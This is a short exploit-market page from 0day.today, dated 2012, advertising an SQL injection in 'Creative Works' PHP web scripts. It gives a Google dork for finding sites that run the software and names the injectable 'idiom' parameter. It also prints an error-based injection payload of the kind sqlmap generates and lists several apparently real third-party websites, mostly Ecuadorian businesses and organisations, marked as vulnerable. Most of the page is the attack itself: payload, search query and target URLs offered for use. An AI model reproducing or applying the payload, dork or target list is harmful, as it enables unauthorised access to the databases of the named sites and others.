[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Creative Works - SQL Injection Vulnerability

Author
sh3ll0n
Risk
[
Security Risk High
]
0day-ID
0day-ID-18452
Category
web applications
Date add
10-05-2012
Platform
php
# Exploit Title:Creative Works Multiple sql web scripts

# Google Dork:Powered by: Creative Works

# Software Link:www.creativeworks.com.ec

# Version:2012

# Tested on:linux and windows any os

#credits:Security Warriors Team SWT http://www.facebook.com/groups/279352788763082/

descripcion:

index.php?idiom=sql injection

herramienta sqlmap test bug sql

code inject test: idiom=1 AND (SELECT 2358 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT (CASE WHEN (2358=2358) THEN 1 ELSE 0 END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

http://www.hotelesecuador.com/detalles.php?cod_hotel=54&idiom=1 [SQL Injection]
http://www.ceda.org.ec/publicaciones2.php?menu=18&submenu1=48&cod_doc=2219 [SQL Injection]
http://www.puntocafe.ec/contenidos.php?menu=84&idiom=1  [SQL Injection]
http://www.martel.com.ec/contenidos.php?menu=23&submenu1=27&idiom=1 [SQL Injection]
http://www.ceda.org.ec/publicaciones2.php?menu=18&submenu1=48&cod_doc=2219 [SQL Injection]
http://www.emco.com.ec/contenidos.php?menu=73&idiom=1 [SQL Injection]

creditos:cr0n0x de Security Warriors Team SWT



#  0day.today [2024-12-24]  #